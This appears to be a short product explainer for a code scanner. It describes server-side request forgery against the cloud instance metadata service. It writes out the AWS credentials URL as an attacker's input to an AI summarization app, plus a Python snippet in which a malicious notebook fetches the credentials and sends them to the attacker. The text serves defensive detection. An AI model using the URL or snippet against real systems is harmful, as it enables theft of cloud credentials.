SSRF: The Cloud Metadata Attack Vector

The Magic IP: 169.254.169.254

If you run code on AWS, Google Cloud, or Azure, there is a special local IP address available to every instance: 169.254.169.254.

This is the Instance Metadata Service (IMDS). If you query it, it returns information about the server. Crucially, it can return temporary IAM credentials for the role attached to the server.

The Attack in AI Apps

AI applications often fetch data from URLs (e.g., "Summarize this article: [URL]"). If the application doesn't validate the URL, an attacker can input:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

The AI app fetches this "article," reads the JSON containing the AWS keys, and summarizes it (or prints it) for the attacker.

Malicious Models and Notebooks

This isn't just a web app issue. A malicious Jupyter Notebook or Pickle Model running inside your VPC can execute:

import requests
creds = requests.get("http://169.254.169.254/...").text
send_to_attacker(creds)

Detecting SSRF Attempts

You should block this IP at the network level, but you should also scan your codebase for attempts to access it.

Veritensor flags any hardcoded instance of 169.254.169.254 or metadata.google.internal. Finding this string in a dataset or script is a massive red flag indicating an attempted cloud compromise.

The Magic IP: 169.254.169.254​

The Attack in AI Apps​

Malicious Models and Notebooks​

Detecting SSRF Attempts​

The Magic IP: 169.254.169.254

The Attack in AI Apps

Malicious Models and Notebooks

Detecting SSRF Attempts